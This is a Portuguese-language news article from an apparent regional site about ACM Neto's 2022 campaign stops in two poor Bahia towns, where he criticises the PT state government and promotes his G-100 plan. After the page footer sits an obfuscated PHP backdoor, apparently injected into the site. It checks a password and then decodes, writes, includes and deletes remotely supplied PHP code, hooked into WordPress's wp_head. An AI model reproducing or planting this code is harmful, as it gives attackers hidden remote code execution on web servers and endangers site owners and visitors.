• SEJA BEM-VINDO

ACM Neto critica ‘ausência’ do governo do PT nos municípios mais pobres da Bahia

Publicado em: 22/09/2022 Atualizado:: setembro 22, 2022

 

‘A gente precisa mudar de vez por todas essas realidades’, disse o ex-prefeito

 

Em agendas nos municípios de Pedro Alexandre e Novo Triunfo, nesta quarta-feira (21), o candidato a governador ACM Neto (União Brasil) afirmou que os menores e mais pobres municípios da Bahia terão, a partir de 1° de janeiro, um governador. Segundo o ex-prefeito de Salvador, a gestão do PT não conseguiu, em 16 anos, resolver os problemas mais básicos nessas cidades.

 

“Quem olha para Novo Triunfo vê que aqui não tem governador. E vê que é preciso uma atenção maior do governo do estado. A gente precisa mudar de vez por todas essa realidade. O que o povo baiano quer é mudança, isso é claro. Se não fosse verdade, a gente não juntaria tanta gente assim numa praça às 16h de uma quarta-feira”, disse ACM Neto na cidade.

 

Na ocasião, Neto destacou a importância das cidades do Nordeste baiano de apenas 16 mil habitantes cada, que aparecem entre os menores IDH do estado. Ele aproveitou para citar o projeto batizado de G-100, que está no seu plano de governo. O objetivo, segundo ele, é realizar uma série de ações coordenadas nas áreas de saúde, saneamento básico, educação e geração de emprego nos 100 municípios mais pobres da Bahia, ou seja, aqueles que aparecem com o menor Índice de Desenvolvimento Humano (IDH) do estado.

 

“Novo Triunfo pode e vai, se Deus quiser, passar por uma transformação a partir do próximo ano. Porque, vamos falar a verdade. Normalmente, os governantes priorizam os grandes centros, focam em trabalhar pelas grandes cidades, porque é onde têm mais votos. E tenham certeza que Novo Triunfo será um dos primeiros municípios a passar pelas ações coordenadas do G-100”, disse.

 

Em Pedro Alexandre, o IDH é de 0,513, e em Novo Triunfo, de 0,554, pouco acima do nível considerado de qualidade de vida muito baixa, que é de 0,5. Neto disse que o grupo que está à frente da Bahia nos últimos 16 anos não demonstrou capacidade de resolver problemas graves dos menores municípios, como acesso à saúde e à educação e garantia de segurança pública.

 

“Hoje, a Bahia é primeiro lugar no Brasil em número de pessoas desempregadas. Tem muitas cidades pequenas em que a atividade econômica é pequena. O povo depende dos salários da prefeitura, dos programas como Bolsa Família e Auxílio Brasil ou das aposentadorias. Nós precisamos trazer empregos para o interior, mas esse é um desafio que as pessoas que estão aí no poder não vão conseguir”, completou.

 

……………………….

 

Fonte: Bahia.ba

 

 

 


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}